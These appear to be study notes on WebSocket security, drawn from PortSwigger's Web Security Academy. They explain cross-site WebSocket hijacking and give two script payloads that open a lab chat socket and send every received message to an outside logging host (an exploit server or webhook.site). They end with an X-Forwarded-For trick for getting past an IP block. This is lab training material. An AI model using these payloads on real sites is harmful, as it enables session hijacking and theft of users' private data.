WebSocket Vulnerability
https://portswigger.net/web-security/websockets/what-are-websockets
What is the difference between HTTP and WebSockets?
Most communication between web browsers and web sites uses HTTP. With HTTP, the client
sends a request and the server returns a response. Typically, the response occurs immediately,
and the transaction is complete. Even if the network connection stays open, this will be used for
a separate transaction of a request and a response.
Some modern web sites use WebSockets. WebSocket connections are initiated over HTTP and
are typically long-lived. Messages can be sent in either direction at any time and are not
transactional in nature. The connection will normally stay open and idle until either the client or
the server is ready to send a message.
WebSockets are particularly useful in situations where low-latency or server-initiated messages
are required, such as real-time feeds of financial data.
Cross-site WebSocket hijacking
What is cross-site WebSocket hijacking?
Cross-site WebSocket hijacking (also known as cross-origin WebSocket hijacking) involves a
cross-site request forgery (CSRF) vulnerability on a WebSocket handshake. It arises when the
WebSocket handshake request relies solely on HTTP cookies for session handling and does not
contain any CSRF tokens or other unpredictable values.
An attacker can create a malicious web page on their own domain which establishes a cross-site
WebSocket connection to the vulnerable application. The application will handle the connection
in the context of the victim user's session with the application.
The attacker's page can then send arbitrary messages to the server via the connection and read the
contents of messages that are received back from the server. This means that, unlike regular
CSRF, the attacker gains two-way interaction with the compromised application.
The payload below targets the PortSwigger cross-site WebSocket hijacking lab. The handshake relies only on the session cookie for validation, and that cookie is set with SameSite=None, so the browser attaches it to the cross-site handshake.
<script>
var ws = new WebSocket('wss://0a43009403946ced80bd8564004f003e.web-security-academy.net/chat');
ws.onopen = function() {
    ws.send("READY");
};
ws.onmessage = function(event) {
    fetch('https://exploit-0af9007403d66c91807a849f010b0095.exploit-server.net/log?msg=' + encodeURIComponent(event.data));
};
</script>
[OR]
<script>
var ws = new WebSocket('wss://0aba004704633d69804fa326000f00b2.web-security-academy.net/chat');
ws.onopen = function() {
    ws.send("READY"); // Sends a message to the WebSocket server upon connection
};
ws.onmessage = function(event) {
    fetch('https://webhook.site/xxxxxxxxxxxxxxxxx', {
        method: 'POST',
        mode: 'no-cors',
        body: event.data
    });
};
</script>
Manipulating the WebSocket handshake
When the WebSocket server has blocked our IP address, we can add an X-Forwarded-For: 1.1.1.1 header to the handshake request (for example, from an intercepting proxy) to get past the block, and then send the XSS payloads.